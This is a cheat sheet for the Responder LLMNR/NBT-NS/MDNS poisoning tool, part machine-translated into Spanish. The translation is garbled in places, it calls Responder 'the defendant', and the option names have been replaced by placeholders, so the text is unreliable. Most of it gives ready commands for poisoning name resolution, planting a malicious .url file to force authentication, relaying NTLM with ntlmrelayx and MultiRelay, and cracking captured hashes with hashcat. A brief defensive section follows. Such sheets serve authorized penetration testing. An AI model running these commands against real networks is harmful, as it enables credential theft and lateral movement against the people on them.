Responder Cheat Sheet
Overview¶
Responder es un potente LLMNR (Resolución de Nombres Multicast de Enlace-Local), NBT-NS (NetBIOS Name Service), y el envenenador MDNS (Multicast DNS). Está diseñado para responder a consultas específicas de resolución de nombres de red e incluye servidores integrados de autenticación HTTP/SMB/MSSQL/FTP/LDAP que apoyan la autenticación NTLMv1/NTLMv2/LMv2.
▪ restablecimiento Advertencia: El demandado es una herramienta de pruebas de seguridad que sólo debe utilizarse en entornos donde tiene permiso explícito para hacerlo.
Instalación¶
Kali Linux¶
From GitHub¶
# Clone the repository
git clone https://github.com/lgandx/Responder
# Navigate to the directory
cd Responder
# Make the Python script executable
chmod +x Responder.py
Usando pip¶
Uso básico¶
Begin Responder¶
# Basic usage with interface specification
responder -I eth0
# Start with all options enabled
responder -I eth0 -wrf
# Analyze mode (passive)
responder -I eth0 -A
Command Line Options¶
| Option | Description |
|---|---|
| INLINE_CODE_21 | Show help message and exit |
| INLINE_CODE_22 | Analyze mode. Do not poison any requests, just analyze traffic |
| INLINE_CODE_23 | Network interface to use |
| INLINE_CODE_24 | IP address to bind to |
| INLINE_CODE_25 | External IP address (for DHCP options) |
| INLINE_CODE_26 | Return a Basic HTTP authentication. Default: NTLM |
| INLINE_CODE_27 | Enable answers for netbios wredir suffix queries |
| INLINE_CODE_28 | Enable answers for netbios domain suffix queries |
| INLINE_CODE_29 | Fingerprint hosts that issued an NBT-NS or LLMNR query |
| INLINE_CODE_30 | Start the WPAD rogue proxy server |
| INLINE_CODE_31 | Upstream HTTP proxy used by the rogue WPAD proxy |
| INLINE_CODE_32 | Force NTLM/Basic authentication on wpad.dat file retrieval |
| INLINE_CODE_33 | Force NTLM/Basic authentication for any proxy request |
| INLINE_CODE_34 | Force LM hashing downgrade for Windows XP/2003 and earlier |
| INLINE_CODE_35 | Increase verbosity |
| INLINE_CODE_36 | Log to file in addition to console |
| INLINE_CODE_37 | Do not log to syslog |
| INLINE_CODE_38 | Do not log to stdout |
| INLINE_CODE_39 | Path to configuration file |
| INLINE_CODE_40 | Enable/disable specific server (HTTP, SMB, etc.) |
| INLINE_CODE_41 | Enable the MSSQL server |
| INLINE_CODE_42 | Enable the MSSQL server |
| INLINE_CODE_43 | Enable the HTTPS server |
| INLINE_CODE_44 | Enable the HTTP server |
| INLINE_CODE_45 | Enable the SMB server |
| INLINE_CODE_46 | Enable the FTP server |
| INLINE_CODE_47 | Enable the IMAP server |
| INLINE_CODE_48 | Enable the POP server |
| INLINE_CODE_49 | Enable the SMTP server |
| INLINE_CODE_50 | Enable the LDAP server |
| INLINE_CODE_51 | Enable the DNS server |
Archivo de configuración¶
El archivo de configuración se encuentra en __INLINE_CODE_52_ o en el directorio Responder como Responder.conf.
Opciones de configuración clave¶
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
Attack Scenarios¶
Basic LLMNR/NBT-NS Poisoning¶
# Start Responder with default settings
responder -I eth0 -v
# Wait for authentication attempts
# Hashes will be saved in the logs directory
Autenticación forzada vía UNC Path¶
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url
# Start Responder
responder -I eth0 -v
# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash
WPAD Ataque¶
# Start Responder with WPAD enabled
responder -I eth0 -w -v
# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts
Relay Attack Setup¶
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support
Hash Capture and Cracking¶
Viewing Captured Hashes¶
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt
# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data
Cracking with Hashcat¶
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist
# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist
Advanced Techniques¶
Usando Responder con MultiRelay¶
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL
Poisoning Specific Hosts¶
# Create a file with target IPs
echo "192.168.1.10" > targets.txt
# Start Responder with target file
responder -I eth0 -v -e targets.txt
Custom Challenge Value¶
Medidas defensivas¶
Disabling LLMNR via Group Policy¶
- Open Group Policy Editor
- Navegue a Configuración de Computación > Plantillas administrativas √® Red de contactos DNS Cliente
- Activar la resolución de nombres multicast
Disabling NBT-NS via Command Line¶
# Disable NBT-NS on Windows
netsh interface ipv4 set interface "Local Area Connection" nbtbios=disabled
Disabling NBT-NS via Registry¶
Detectando la actividad del demandado¶
# Monitor for suspicious LLMNR/NBT-NS responses
# Look for multiple services running on the same IP
# Check for unusual authentication attempts
Troubleshooting¶
Common Issues¶
- ** Conflictos de Puertos** ```bash # Check if ports are already in use netstat -tuln|grep -E '445|80|53'
# Kill conflicting processes
sudo kill
-
Interface Not Found**¶
```bash # List available interfaces ip a
# Use the correct interface name
responder -I
-
** Cuestiones de misión**
bash # Run with sudo sudo responder -I eth0 -
Ningún Hashes Captured
bash # Check if Responder is running in analyze mode # Ensure the network allows the required traffic # Try forcing authentication with UNC paths
Resources¶
- [Repositorio de GitHub Official](URL_60__
- MITRE ATT limitadaCK - LLMNR/NBT-NS Poisoning
- [Kali Linux Tools - Responder](URL_62__
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de Responder en escenarios de pruebas de seguridad. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *